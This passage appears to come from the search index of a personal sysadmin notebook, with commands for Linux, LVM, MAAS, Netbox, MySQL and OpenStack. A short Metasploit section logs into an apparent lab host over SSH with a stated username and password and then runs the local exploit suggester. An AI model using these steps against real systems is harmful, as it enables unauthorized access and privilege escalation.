    "},{"location":"linux/#using-the-ip-tool-to-change-connecticity","title":"Using the \"ip\" tool to change connecticity\"","text":"
    ip link set $DEV_NAME down\nip link set $DEV_NAME up\n\nip route add default via $DEF_GW_IP dev $DEV_NAME\nip addr add $IP_ADDR_CIDR dev $DEV_NAME\nip addr delete $IP_ADDR_CIDR dev $DEV_NAME\n
    "},{"location":"linux/#fix-br-and-vmbr-linux-bridges-filtering-lldp-packets","title":"Fix BR and VMBR Linux bridges filtering LLDP packets","text":"
    https://interestingtraffic.nl/2017/11/21/an-oddly-specific-post-about-group_fwd_mask/\n\necho 16384 > /sys/class/net/$VMBR_INTERFACE/bridge/group_fwd_mask\n
    "},{"location":"linux/#add-fish-as-the-default-shell-for-ubuntudebian","title":"Add fish as the default shell for Ubuntu/Debian.","text":"
    sudo apt-get install fish\n\ncoldadmin@big-potato ~> cat /etc/shells \n# /etc/shells: valid login shells\n/bin/sh\n/bin/bash\n/bin/rbash\n/bin/dash\n/usr/bin/tmux\n/usr/bin/fish\n\nchsh -s /usr/bin/fish\n
    "},{"location":"linux/#one-history-file-for-multiple-prompts","title":"One history file for multiple prompts.","text":"
    vim ~/.bashrc\nexport PROMPT_COMMAND='history -a'\n
    "},{"location":"linux/#enable-terminus-powerline-on-ubuntu-font-name-is-terminess","title":"Enable Terminus Powerline on Ubuntu (font name is Terminess)","text":"
    https://github.com/powerline/fonts/issues/210\nhttps://superuser.com/questions/886023/linux-mint-installing-bdf-fonts-with-console-fc-cache-fc-list\n\ngit clone https://github.com/powerline/fonts\ncd fonts\n./install.sh\n\ncd /etc/fonts/conf.d/\nsudo rm /etc/fonts/conf.d/10*  \nsudo rm -rf 70-no-bitmaps.conf \nsudo ln -s ../conf.avail/70-yes-bitmaps.conf .\nsudo dpkg-reconfigure fontconfig\n
    "},{"location":"linux/#ubuntu-1904-disable-ubuntu-dock-completely","title":"Ubuntu 19.04 - Disable Ubuntu dock completely.","text":"

    https://askubuntu.com/questions/1030138/how-can-i-get-rid-of-the-dock-in-ubuntu-18

    cd /usr/share/gnome-shell/extensions/\nsudo mv ubuntu-dock@ubuntu.com{,.bak}\n
    "},{"location":"linux/#change-fan-speed-of-a-r710-through-ipmi","title":"Change fan speed of a R710 through IPMI.","text":"

    IPMI needs to be enabled in ILO! You need valid credentials! This disables the auto-adjust of the fan speed, be careful of the R710 heating. I am not responsible for fires :)

    #Get the ENV data from the IPMI\nipmitool  -I lanplus -H 10.200.10.113 -U root -P $PASSWORD sensor reading \"Ambient Temp\" \"FAN 1 RPM\" \"FAN 2 RPM\" \"FAN 3 RPM\"\n\n#Enable manual fan control.\nipmitool  -I lanplus -H 10.200.10.113 -U root -P $PASSWORD raw 0x30 0x30 0x01 0x00\n\n#\"Activating manual fan speeds! (2160 RPM)\"\nipmitool  -I lanplus -H 10.200.10.113 -U root -P $PASSWORD raw 0x30 0x30 0x02 0xff 0x09\n
    "},{"location":"linux/#check-bonding-status","title":"Check bonding status","text":"
    cat /proc/net/bonding/mgmt\ncat /proc/net/bonding/$INTERFACE_NAME_HERE\n
    "},{"location":"linux/#get-low-level-interface-stats","title":"Get low-level interface stats","text":"
    ethtool -S $INTERFACE_NAME_HERE\nethtool -S mgmt-1\n
    "},{"location":"linux/#ssh-without-using-all-identity-files-automatically","title":"SSH without using all identity files automatically","text":"
    ssh -o \"IdentitiesOnly true\" -v -A user@host\n
    "},{"location":"linux/#remove-resolvctl-issues-with-openvpn-dns-being-removed","title":"Remove resolvctl (issues with OpenVPN DNS being removed)","text":"
    sudo systemctl disable systemd-resolved.service\nsudo systemctl stop systemd-resolved.service\n\ndns=default in [main] section of \"sudo vi /etc/NetworkManager/NetworkManager.conf\"\n\nsudo rm /etc/resolv.conf\nsudo service network-manager restart\n
    "},{"location":"linux/#troubleshoot-apt-install-errors","title":"Troubleshoot APT install errors.","text":"
    # Find the correct file from :\ncd /var/lib/dpkg/info/\n# In this case, it was the Foreman postinst script\ncat foreman.postinst\n# Increase verbosity\nEXPORT DEBUG=1\n# Run the failing configure package\ndpkg --configure foreman\n
    "},{"location":"linux/#docker-hugo","title":"Docker Hugo","text":"
    docker run --rm -it -v /srv/hugo:/src -u hugo laurentfdumont/laurent-hugo hugo new site mysite\ndocker run --rm -it -v /srv/hugo/mysite:/src -u hugo laurentfdumont/laurent-hugo hugo new posts/my-first-post.md\ndocker run --rm -it -v /srv/hugo/mysite/:/src -u hugo laurentfdumont/laurent-hugo hugo\ndocker run --rm -it -v /srv/hugo/mysite:/src -p 1313:1313 -u hugo laurentfdumont/laurent-hugo hugo server -b http://linode2.coldnorthadmin.com -w --bind=0.0.0.0\ndocker run --rm -it -v /srv/hugo/mysite:/src -u hugo laurentfdumont/laurent-hugo hugo new posts/my-first-post.md\ndocker run --rm -it -v /srv/hugo:/src -u hugo jguyomard/hugo-builder hugo new site mysite \n
    "},{"location":"linux/#check-and-clean-for-fstrim","title":"Check and clean for FSTRIM","text":"

    Only support for SCSI disk - proxmox.

    #Check TRIM support status\nlsblk -D\n\n### BAD NO support\nroot@kolla-controller003:~# lsblk -D\nNAME              DISC-ALN DISC-GRAN DISC-MAX DISC-ZERO\nvda                      0        0B       0B         0\n|-vda1                   0        0B       0B         0\n|-vda2                   0        0B       0B         0\n`-vda5                   0        0B       0B         0\n  |-system-root          0        0B       0B         0\n  `-system-swap_1        0        0B       0B         0\n\n### OK support\nroot@kolla-compute004:~# lsblk -D\nNAME              DISC-ALN DISC-GRAN DISC-MAX DISC-ZERO\nsda                      0        4K       1G         0\n|-sda1                   0        4K       1G         0\n|-sda2                1024        4K       1G         0\n`-sda5                   0        4K       1G         0\n  |-system-root          0        4K       1G         0\n  `-system-swap_1        0        4K       1G         0\n\n### Start TRIM PROCESS\nfstrim -av\nroot@kolla-compute004:~# fstrim -av\n/boot: 755.4 MiB (792125440 bytes) trimmed\n/: 49 GiB (52552167424 bytes) trimmed\n
    "},{"location":"linux/#reduce-swap-size-and-increase-root-fs-size","title":"Reduce swap size and increase root FS size","text":"
    # Disable swap temporarly.\nswapoff -a\n\n# Reduce swap paritition.\nlvreduce /dev/superbacon-vg/swap_1 -L -67G\n\n# Extend LVM root paritition.\nlvextend /dev/superbacon-vg/root -L +67G\n\n# Extend actual partition size.\nresize2fs /dev/superbacon-vg/root\n\n# Recreate swap partition\nmkswap /dev/superbacon-vg/swap_1\n\n# Re-enable swap partition\nswapon -a\n
    "},{"location":"linux/#mount-disk-to-linux","title":"Mount disk to linux","text":"
    # Create an ext4 partition.\nmkfs.ext4 /dev/vg-storage/lv-storage\n\n# Mount the partition to test.\nmount -t ext4 /dev/vg-storage/lv-storage /mnt\n\n# Mount in /etc/fstab\n/dev/mapper/vg--storage-lv--storage /storage    ext4    defaults,nofail        0    1\n
    "},{"location":"linux/#check-iscsi-disks","title":"Check ISCSI disks","text":"
    sudo lsblk -S\n
    "},{"location":"linux/#boot-logs","title":"Boot logs","text":"
    /var/log/boot.log  ---  System boot log\n\n/var/log/dmesg     ---  print or control the kernel ring buffer\n
    "},{"location":"linux/#upgrade-kernel-on-centos7","title":"Upgrade Kernel on Centos7","text":"
    [root@ooo-director ~]# rpm --import https://www.elrepo.org/RPM-GPG-KEY-elrepo.org\n[root@ooo-director ~]# yum install https://www.elrepo.org/elrepo-release-7.0-4.el7.elrepo.noarch.rpm\n
    [root@ooo-director ~]# yum repolist\nLoaded plugins: fastestmirror, priorities\nLoading mirror speeds from cached hostfile\n * base: mirror.calgah.com\n * elrepo: iad.mirror.rackspace.com\n * extras: mirror.calgah.com\n * updates: mirror.calgah.com\nrepo id                                                repo name                                                                                       status\nbase/7/x86_64                                          CentOS-7 - Base                                                                                  10,097\ndelorean-train                                         delorean-openstack-trove-7680b5ef0e3608b2c45f057f65337c4af3d5659d                               801+348\ndelorean-train-build-deps                              dlrn-train-build-deps                                                                            139+78\ndelorean-train-testing                                 dlrn-train-testing                                                                              875+823\nelrepo                                                 ELRepo.org Community Enterprise Linux Repository - el7                                              139\nextras/7/x86_64                                        CentOS-7 - Extras                                                                                   307\nrdo-qemu-ev/x86_64                                     RDO CentOS-7 - QEMU EV                                                                               87\nupdates/7/x86_64                                       CentOS-7 - Updates                                                                                1,010\nrepolist: 13,455\n
    yum --enablerepo=elrepo-kernel install kernel-ml\n
    [root@ooo-director ~]# awk -F\\' '$1==\"menuentry \" {print i++ \" : \" $2}' /etc/grub2.cfg\n0 : CentOS Linux (5.4.6-1.el7.elrepo.x86_64) 7 (Core)\n1 : CentOS Linux (3.10.0-1062.9.1.el7.x86_64) 7 (Core)\n2 : CentOS Linux (3.10.0-1062.el7.x86_64) 7 (Core)\n3 : CentOS Linux (0-rescue-4fb19b5248cd40d9b9a1ec7361f4f1fa) 7 (Core)\n\n[root@ooo-director ~]# grub2-set-default 0\n\n[root@ooo-director ~]# grub2-mkconfig -o /boot/grub2/grub.cfg\nGenerating grub configuration file ...\nFound linux image: /boot/vmlinuz-5.4.6-1.el7.elrepo.x86_64\nFound initrd image: /boot/initramfs-5.4.6-1.el7.elrepo.x86_64.img\nFound linux image: /boot/vmlinuz-3.10.0-1062.9.1.el7.x86_64\nFound initrd image: /boot/initramfs-3.10.0-1062.9.1.el7.x86_64.img\nFound linux image: /boot/vmlinuz-3.10.0-1062.el7.x86_64\nFound initrd image: /boot/initramfs-3.10.0-1062.el7.x86_64.img\nFound linux image: /boot/vmlinuz-0-rescue-4fb19b5248cd40d9b9a1ec7361f4f1fa\nFound initrd image: /boot/initramfs-0-rescue-4fb19b5248cd40d9b9a1ec7361f4f1fa.img\ndone\n
    "},{"location":"linux/#ps-a-process-list-for-process-accounting","title":"PS a process list for process accounting","text":"
    ps -eo cmd \n
    "},{"location":"linux/#send-a-sysrq-though-kvm","title":"Send a sysrq though KVM","text":"

    Types of event Dec 26 20:04:49 director kernel: SysRq : HELP : loglevel(0-9) reboot(b) crash(c) terminate-all-tasks(e) memory-full-oom-kill(f) kill-all-tasks(i) thaw-filesystems(j) sak(k) show-backtrace-all-active-cpus(l) show-memory-usage(m) nice-all-RT-tasks(n) poweroff(o) show-registers(p) show-all-timers(q) unraw(r) sync(s) show-task-states(t) unmount(u) force-fb(V) show-blocked-tasks(w) dump-ftrace-buffer(z)

    #In the guest VM\necho 1 > /proc/sys/kernel/sysrq\n\n#To make it permanent\n[root@director ~]# cat /etc/sysctl.d/sysrq.conf \nkernel.sysrq = 1\n\n#From the Hypervisor\n#KEY_B replace what is after the _ for the correct action. This will reboot the target host.\nroot@kvm01:/tmp# virsh send-key ooo-director KEY_LEFTALT KEY_SYSRQ KEY_B\n
    "},{"location":"linux/#install-pgcli-postgres-cmd-line-cli-ubuntu-1904","title":"Install pgcli - postgres cmd line CLI - Ubuntu 19.04","text":"
    sudo apt-get install libpq-dev python-dev\npip3 install pgcli\npgcli --host 127.0.0.1 --port 5432 --user ara_user --dbname ara --password\n
    "},{"location":"linux/#redhat-centos-bonding-lacp-vlan","title":"Redhat / Centos bonding LACP - VLAN","text":"
    modprobe bonding\n\n#vi /etc/sysconfig/network-scripts/ifcfg-bond0\nDEVICE=bond0\nType=Bond\nNAME=bond0\nBONDING_MASTER=yes\nBOOTPROTO=none\nONBOOT=yes\nNM_CONTROLLED=no\nBONDING_OPTS=\"mode=4 miimon=100 lacp_rate=1\"\n\n#vi /etc/sysconfig/network-scripts/ifcfg-em1\nDEVICE=em1\nTYPE=Ethernet\nBOOTPROTO=none\nONBOOT=yes\nNM_CONTROLLED=no\nIPV6INIT=no\nMASTER=bond0\nSLAVE=yes\n\n#vi /etc/sysconfig/network-scripts/ifcfg-em2\nDEVICE=em2\nTYPE=Ethernet\nBOOTPROTO=none\nONBOOT=yes\nNM_CONTROLLED=no\nIPV6INIT=no\nMASTER=bond0\nSLAVE=yes\n\n#vi /etc/sysconfig/network-scripts/ifcfg-em3\nDEVICE=em3\nTYPE=Ethernet\nBOOTPROTO=none\nONBOOT=yes\nNM_CONTROLLED=no\nIPV6INIT=no\nMASTER=bond0\nSLAVE=yes\n
    "},{"location":"linux/#write-speed-test","title":"Write speed test","text":"

    https://www.thomas-krenn.com/en/wiki/Linux_I/O_Performance_Tests_using_dd

    dd if=/dev/zero of=/root/testfile bs=1G count=1 oflag=dsync\n
    "},{"location":"linux/#extend-lv","title":"Extend lv","text":"
    sudo lvextend -l +100%FREE /dev/ubuntu-vg/ubuntu-lv\nsudo resize2fs /dev/ubuntu-vg/ubuntu-lv\n
    "},{"location":"linux/#set-dns-with-resolvctl","title":"Set DNS with resolvctl","text":"
    laurentdumont@docker01:/srv$ sudo resolvectl dns \nGlobal:\nLink 17 (vethc025466):\nLink 15 (vetheb3b292):\nLink 13 (veth45fcbdc):\nLink 3 (docker0):\nLink 2 (ens192): 10.199.199.1\n\n\nsudo resolvectl dns ens192 10.199.199.1\n
    "},{"location":"linux/#fix-openvpn-dns-issues-with-new-resolved-for-dns","title":"Fix openvpn DNS issues with new resolved for DNS","text":"
    sudo apt install openvpn-systemd-resolved\n
    "},{"location":"linux/#show-disk-info","title":"Show disk info","text":"
    lshw -class disk\nhwinfo --disk\n
    "},{"location":"linux/#create-one-pdf-from-multiple","title":"Create one PDF from multiple","text":"
    # From within folder containing the PDF pages \nqpdf --empty --pages *.pdf -- out.pdf\n
    "},{"location":"linux/#change-image-size","title":"Change image size","text":"
    convert myfigure.png -resize 200x100 myfigure.jpg\n
    "},{"location":"lvm/","title":"LVM","text":""},{"location":"lvm/#reduce-swap-and-extend-other-lvm-module","title":"Reduce swap and extend other LVM module","text":"
    # Disable swap temporarly.\nswapoff -a\n\n# Reduce swap paritition.\nlvreduce /dev/superbacon-vg/swap_1 -L -67G\n\n# Extend LVM root paritition.\nlvextend /dev/superbacon-vg/root -L +67G\n\n# Extend actual partition size.\nresize2fs /dev/superbacon-vg/root\n\n# Recreate swap partition\nmkswap /dev/superbacon-vg/swap_1\n\n# Re-enable swap partition\nswapon -a\n\n----------------- Mount partition from existing VG/LV -----------------\n# Create an ext4 partition.\nmkfs.ext4 /dev/vg-storage/lv-storage\n\n# Mount the partition to test.\nmount -t ext4 /dev/vg-storage/lv-storage /mnt\n\n# Mount in /etc/fstab\n/dev/mapper/vg--storage-lv--storage /storage    ext4    defaults,nofail        0    1\n
    7  echo \"deb http://download.proxmox.com/debian/pve stretch pve-no-subscription\" > /etc/apt/sources.list.d/pve-install-repo.list\n    8  wget http://download.proxmox.com/debian/proxmox-ve-release-5.x.gpg -O /etc/apt/trusted.gpg.d/proxmox-ve-release-5.x.gpg\n    9  apt update && apt dist-upgrade\n   10  apt install proxmox-ve postfix open-iscsi\n   11  clear\n   12  shutdown -r now\n   13  mount /dev/sdb1 /storage\n   14  mkdir /storage\n   15  mount /dev/sdb1 /storage\n   16  mount /dev/sdb /storage\n   17  mount -t ext4 /dev/sdb /storage\n   18  dmesg | tail\n   19  fdisk -l\n   20  lvdisplay \n   21  vgdisplay \n   22  vgscan \n   23  fdisk -l\n   24  clear\n   25  vgdisplay \n   26  lvmdiskscan \n   27  vgcreate \n   28  vgcreate /dev/sdb1\n   29  pvs\n   30  vgcreate vg-storage /dev/sdb1\n   31  vgdisplay \n   32  man lvcreate \n   33  lvcreate -n storage -l 100%FREE vg-storage\n   34  lvdisplay \n   35  clear\n   36  mkfs.ext4 /dev/vg-storage/storage\n   37  lvdisplay \n   38  man mount\n   39  man mount\n   40  man mount\n   41  mount -t ext4 /dev/vg-storage/storage /storage\n   42  cd /storage\n   43  mkdir tata\n   44  ls\n   45  rm tata\n   46  rm -rf tata\n   47  clear\n   48  exit\n   49  history\n
    "},{"location":"maas/","title":"MAAS","text":""},{"location":"maas/#adding-a-custom-power-provider-for-maas","title":"Adding a custom power provider for MAAS.","text":""},{"location":"maas/#install-proxmoxer-for-python3","title":"Install proxmoxer for Python3","text":"
    pip3 install proxmoxer\n
    "},{"location":"maas/#proxmox-script-source-httpsbugslaunchpadnetmaasbug1805799","title":"Proxmox Script - source https://bugs.launchpad.net/maas/+bug/1805799","text":"
    # Copyright 2018 Wojciech Rakoniewski  \n# This software is licensed under the\n# GNU Affero General Public License version 3 (see the file LICENSE).\n#\n# tested on Proxmox VE 5.2-11 but should work with any version\n# libraries: proxmoxer\n#   tested with version 1.02 installed using apt\n\n\"\"\"Proxmox Power Driver for MAAS\"\"\"\n\n__all__ = [\n        \"ProxmoxError\",\n        \"ProxmoxPowerDriver\"\n        ]\n\nfrom provisioningserver.drivers import (\n    make_ip_extractor,\n    make_setting_field,\n    SETTING_SCOPE,\n)\nfrom provisioningserver.drivers.power import (\n    PowerDriver,\n    PowerError\n)\n\ntry:\n    from proxmoxer import ProxmoxAPI\n    PROXMOXER_IMPORTED = True\nexcept ImportError:\n    PROXMOXER_IMPORTED = False\n\nPROXMOX_YES=\"y\"\nPROXMOX_NO=\"n\"\n\nPROXMOX_VALIDATE_SSL_CHOICES = [\n    [PROXMOX_YES, \"Yes\"],\n    [PROXMOX_NO, \"No\"]]\n\nclass ProxmoxError(PowerError):\n    \"\"\"Failure communicating to proxmox \"\"\"\n\nclass ProxmoxPowerDriver(PowerDriver):\n\n    name = 'proxmox'\n    chassis = True\n    description = \"Proxmox (virtual systems)\"\n    settings = [\n        make_setting_field(\n            'power_vm_name', \"VM id or name\", required=True,\n            scope=SETTING_SCOPE.NODE),\n        make_setting_field('power_address', \n            \"Proxmox host name or ip\", required=True),\n        make_setting_field('power_user', \n            \"Proxmox username (user@realm)\", required=True),\n        make_setting_field(\n            'power_pass', \"Proxmox password\", field_type='password',\n            required=True),\n        make_setting_field('power_ssl_validate', \"Validate ssl\", \n            field_type='choice', required=True, \n            choices=PROXMOX_VALIDATE_SSL_CHOICES, default=PROXMOX_NO),\n    ]\n    ip_extractor = make_ip_extractor('power_address')\n\n    def detect_missing_packages(self):\n        if not PROXMOXER_IMPORTED:\n            return [\"python3-proxmoxer\"]\n        return []\n\n   
 def power_on(self, system_id, context):\n        \"\"\"Power on Proxmox node.\"\"\"\n        vm=self.__proxmox_login(system_id,context)\n        vm.status.start.post();\n\n    def power_off(self, system_id, context):\n        \"\"\"Power off Proxmox node.\"\"\"\n        vm=self.__proxmox_login(system_id,context)\n        vm.status.stop.post();\n\n    def power_query(self, system_id, context):\n        \"\"\"Power query Proxmox node.\"\"\"\n        vm=self.__proxmox_login(system_id,context)\n        ncd=vm.status.current.get()\n\n        if ncd['status'] == 'running':\n            return \"on\"\n        else:\n            return \"off\"\n\n\n    def __proxmox_login(self,system_id,context):\n        \"\"\"Login to proxmox server.\"\"\"\n\n        api_host = context.get('power_address')\n        api_user = context.get('power_user')\n        api_password = context.get('power_pass')\n        vm_id = context.get('power_vm_name')\n        api_ssl_val = (context.get('power_validate_ssl')==PROXMOX_YES)\n\n        try:\n            api = ProxmoxAPI(api_host, user=api_user, \n                    password=api_password, verify_ssl=api_ssl_val)\n\n            con_vm=None\n            for vm in api.cluster.resources.get(type=\"vm\"):\n                if (str(vm['vmid'])==vm_id) or (vm['name']==vm_id):\n                    con_vm=vm\n                    break\n\n        except Exception:\n            raise ProxmoxError(\n                    \"Can't connect to proxmox cluster %s\" % (api_host))\n\n        if con_vm is None:\n            \"\"\"vm not found\"\"\"\n            raise ProxmoxError(\n                    \"Virtual machine %s not found on proxmox cluster %s\" % (vm_id, api_host))\n\n        #extract node object\n        vm_obj=getattr(getattr(getattr(api.nodes,con_vm['node']),\n            con_vm['type']),\n            str(con_vm['vmid']))\n\n        return vm_obj\n
    "},{"location":"maas/#location-of-the-power-scripts-for-maas","title":"Location of the power scripts for MAAS.","text":"
    /usr/lib/python3/dist-packages/provisioningserver/drivers/power/proxmox.py\n/usr/lib/python3/dist-packages/provisioningserver/drivers/power/registry.py\n
    "},{"location":"maas/#edit-registrypy-and-add-the-following-lines-to-the-bottom-of-the-import-section","title":"Edit registry.py and add the following lines to the bottom of the import section.","text":"
    from provisioningserver.drivers.power.proxmox import ProxmoxPowerDriver\n
    "},{"location":"maas/#add-the-following-line-to-the-bottom-of-the-power_drivers-array","title":"Add the following line to the bottom of the power_drivers array.","text":"
    ProxmoxPowerDriver(),\n
    # Register all the power drivers.\npower_drivers = [\n    AMTPowerDriver(),\n    APCPowerDriver(),\n    DLIPowerDriver(),\n    FenceCDUPowerDriver(),\n    HMCPowerDriver(),\n    IPMIPowerDriver(),\n    ManualPowerDriver(),\n    MoonshotIPMIPowerDriver(),\n    MSCMPowerDriver(),\n    MicrosoftOCSPowerDriver(),\n    NovaPowerDriver(),\n    RECSPowerDriver(),\n    SeaMicroPowerDriver(),\n    UCSMPowerDriver(),\n    VirshPowerDriver(),\n    VMwarePowerDriver(),\n    WedgePowerDriver(),\n    ProxmoxPowerDriver(),\n]\n
    "},{"location":"maas/#restart-the-rack-controller","title":"Restart the rack controller.","text":"
    systemctl restart maas-rackd\n
    "},{"location":"metasploit/","title":"Metasploit","text":""},{"location":"metasploit/#metasploit-plugins","title":"Metasploit plugins","text":""},{"location":"metasploit/#how-to-use-an-ssh-login-as-a-msf-session","title":"How to use an ssh login as a msf session","text":"
    use auxiliary/scanner/ssh/ssh_login\nset rhosts 10.10.127.204\nset username typhoon\nset password 789456123\n\n# show sessions\nsessions\n\nmsf5 post(multi/recon/local_exploit_suggester) > sessions\n\nActive sessions\n===============\n\n  Id  Name  Type         Information                               Connection\n  --  ----  ----         -----------                               ----------\n  1         shell linux  SSH typhoon:789456123 (10.10.127.204:22)  10.9.179.67:40461 -> 10.10.127.204:22 (10.10.127.204)\n\n# use specific session\nset session 1\n
    "},{"location":"metasploit/#use-the-msf-exploit-suggestion","title":"Use the msf exploit suggestion","text":"
    use post/multi/recon/local_exploit_suggester\nexploit\n
    "},{"location":"molecule/","title":"Molecule","text":""},{"location":"molecule/#testing-framework-for-ansible","title":"Testing framework for Ansible.","text":""},{"location":"molecule/#installation-ubuntu-1804-lts","title":"Installation Ubuntu 18.04 LTS","text":"
    sudo apt-get install -y python-pip libssl-dev\npip install --user molecule\n
    "},{"location":"molecule/#create-a-test-setup-in-an-existing-role","title":"Create a test setup in an existing role","text":"
    #From within the role folder\nmolecule init scenario -r my-role-name\n
    "},{"location":"molecule/#start-a-full-testing-run","title":"Start a full testing run","text":"
    sudo molecule test\n
    "},{"location":"mysql/","title":"MySQL/MariaDB","text":""},{"location":"mysql/#create-database-and-user","title":"Create Database and user.","text":"
    CREATE DATABASE `racktables`;\nCREATE USER 'racktables_user' IDENTIFIED BY 'test';\nGRANT ALL privileges ON `racktables`.* TO 'racktables_user'@'%';\n\n\nCREATE DATABASE `netbox`;\nCREATE USER 'netbox_user' IDENTIFIED BY 'test';\nGRANT ALL privileges ON `netbox`.* TO 'netbox_user'@'%';\n
    "},{"location":"mysql/#check-galera-status","title":"Check Galera status","text":"
    MariaDB [(none)]> SHOW GLOBAL STATUS LIKE 'wsrep_%';\n
    "},{"location":"netbox/","title":"Netbox","text":"
    apt-get update\napt-get install -y postgresql libpq-dev\n
    sudo -u postgres psql\nCREATE DATABASE netbox;\nCREATE USER netbox WITH PASSWORD 'bigpotato';\nGRANT ALL PRIVILEGES ON DATABASE netbox TO netbox;\n\\q\n
    apt-get install -y python3 python3-dev python3-setuptools build-essential libxml2-dev libxslt1-dev libffi-dev graphviz libpq-dev libssl-dev zlib1g-dev\neasy_install3 pip\n
    mkdir -p /opt/netbox/ && cd /opt/netbox/\ngit clone -b master https://github.com/digitalocean/netbox.git .\npip3 install -r requirements.txt\npip3 install napalm\n
    sudo apt-get install libapache2-mod-wsgi\nsudo a2enmod wsgi\nsudo a2enmod proxy\nsudo a2enmod proxy_http\nsudo a2enmod headers\nsudo a2ensite netbox\nsudo service apache2 restart\n
    <VirtualHost *:80>\n    ServerName netbox.northernsysadmin.com\n    Redirect permanent / https://netbox.northernsysadmin.com/\n</VirtualHost>\n\n<VirtualHost *:443>\n    SSLEngine on\n    SSLCertificateFile $FULL_CHAIN_CERT_HERE\n    SSLCertificateKeyFile $PRIVATE_KEY_CERT_HERE\n    ProxyPreserveHost On\n\n    ServerName netbox.northernsysadmin.com\n\n    Alias /static /opt/netbox/netbox/static\n\n    # Needed to allow token-based API authentication\n    WSGIPassAuthorization on\n\n    <Directory />\n          SetEnvIfNoCase Host netbox.northernsysadmin\\.com VALID_HOST\n          Order Deny,Allow\n          Deny from All\n          Allow from env=VALID_HOST\n    </Directory>\n\n    <Directory /opt/netbox/netbox/static>\n        Options Indexes FollowSymLinks MultiViews\n        AllowOverride None\n        Require all granted\n    </Directory>\n\n    <Location /static>\n        ProxyPass !\n    </Location>\n\n    RequestHeader set \"X-Forwarded-Proto\" expr=%{REQUEST_SCHEME}\n    ProxyPass / http://127.0.0.1:8001/\n    ProxyPassReverse / http://127.0.0.1:8001/\n</VirtualHost>\n
    "},{"location":"openstack/","title":"Openstack","text":""},{"location":"openstack/#general-troubleshoot-shamelessly-stolen-from-httpwwwpanticzdeindexphpopenstack","title":"General troubleshoot - Shamelessly stolen from : http://www.panticz.de/index.php/openstack","text":"
    # list VMs on all hypervisor\nopenstack server list --all --long  -c Name -c Host\n\n# list VMs on specific hypervisor\nopenstack server list --all -c Name -f value --host ${COMPUTE_NODE}\n\n# get VM count by hypervisor\nopenstack server list --all --long  -c Host -f value | sort | uniq -c\n\n# list compute nodes\nopenstack compute service list\n\n# list compute service\nopenstack compute service list --host ${OS_NODE}\n\n# disable compute service\nfor OS_SERVICE in $(openstack compute service list --host ${OS_NODE} -c Binary -f value); do\n    openstack compute service set --disable --disable-reason \"Maintenance\" ${OS_NODE} ${OS_SERVICE}\ndone\n\nopenstack compute service set --disable --disable-reason potato qasite1-compute001.localdomain nova-compute\n\n# Search for server witch status error\nopenstack server list --all --status ERROR\n\n# Search for server with status resizing\nopenstack server list --all --status=VERIFY_RESIZE\n\n# List instances / VMs\nopenstack server list\nopenstack server list -c ID -c Name -c Status -c Networks -c Host --long\n
    "},{"location":"openstack/#start-all-vms-on-a-single-compute","title":"Start all VMs on a single compute","text":"
    for x in `openstack server list --all -c ID -f value --host tenlab1-compute002.localdomain`;do openstack server start $x;done \n
    "},{"location":"openstack/#migrate-to-specific-compute","title":"Migrate to specific compute","text":"
    nova host-evacuate --target_host kolla-compute003 kolla-compute004.cmaker.studio\nwatch nova migration-list\n
    "},{"location":"openstack/#get-all-the-keypairs-existing-for-all-users","title":"Get all the keypairs existing for all users","text":"
    for x in `openstack user list -f value -c ID`;do echo $x && nova keypair-list --user $x;done\n
    "},{"location":"openstack/#evacuate-single-server-from-compute","title":"Evacuate single server from compute","text":"
    nova evacuate 1d6a436b-e18e-45ce-8b01-bee4a7126f81\n
    "},{"location":"openstack/#evacuate-single-server-from-compute-to-a-specific-destination","title":"Evacuate single server from compute to a specific destination","text":"
    nova evacuate 5f58a1bf-a7f9-4952-b980-af9d52a11e66 qasite1-compute001.localdomain\n
    "},{"location":"openstack/#openstack-create-image-with-different-id","title":"Openstack create image with different id.","text":"

    Use the --id flag

    openstack image create --id cirros-0.4.0 --disk-format qcow2 --container-format bare --public --file ./cirros-0.4.0-x86_64-disk.img cirros-0.4.0\n
    07d76f4e-c920-49ea-af06-bd3c322f16cf\n\nopenstack router set --external-gateway EXT_NET --enable-snat --fixed-ip subnet=EXT_SUB,ip-address=192.168.70.2\n\nneutron net-create PROV_NET --shared --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 71\nneutron subnet-create PROV_NET --name PROV_SUB --disable-dhcp --gateway 192.168.71.1 192.168.71.0/24\n\nneutron net-create EXT_NET --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 70\nneutron subnet-create EXT_NET --name EXT_SUB --allocation-pool start=192.168.70.10,end=192.168.70.100 --disable-dhcp --gateway 192.168.70.1 192.168.70.0/24\n\nnetwork : e23f7863-6e84-4395-bbbb-45877e950f2a\nsubnet : 5bee0941-8d7f-4869-896d-e34e1f2e8b3d\n\n9ce38b2c-b13b-4e65-8e68-32b146115a62 : openstack port create --fixed-ip subnet=5bee0941-8d7f-4869-896d-e34e1f2e8b3d,ip-address=10.100.100.10 --network e23f7863-6e84-4395-bbbb-45877e950f2a cumulus_1\n\neefa2140-fd69-4daf-8b0d-0eafcf3e24b9 : openstack port create --fixed-ip subnet=5bee0941-8d7f-4869-896d-e34e1f2e8b3d,ip-address=10.100.100.11 --network e23f7863-6e84-4395-bbbb-45877e950f2a cumulus_2\n\nneutron net-create PROV_NET --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 71\nneutron subnet-create PROV_NET --name PROV_SUB --allocation-pool start=192.168.71.10,end=192.168.71.100 --disable-dhcp --gateway 192.168.71.1 192.168.71.0/24\nneutron net-create PROV_NET --shared --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 71\nneutron subnet-create PROV_NET --name PROV_SUB --disable-dhcp --gateway 192.168.71.1 192.168.71.0/24\n
    "},{"location":"openstack/#random-useful-commands","title":"Random useful commands","text":"
    openstack server list --all -c ID -c Name --host $NOVA_COMPUTE_NAME_HERE -f value\n
    "},{"location":"openstack/#upload-custom-image","title":"Upload custom image","text":"
    openstack image create --disk-format qcow2 --container-format bare --public --file ./cirros-0.4.0-x86_64-disk.img cirros-0.4.0\n
    "},{"location":"openstack/#create-flavor","title":"Create flavor","text":"
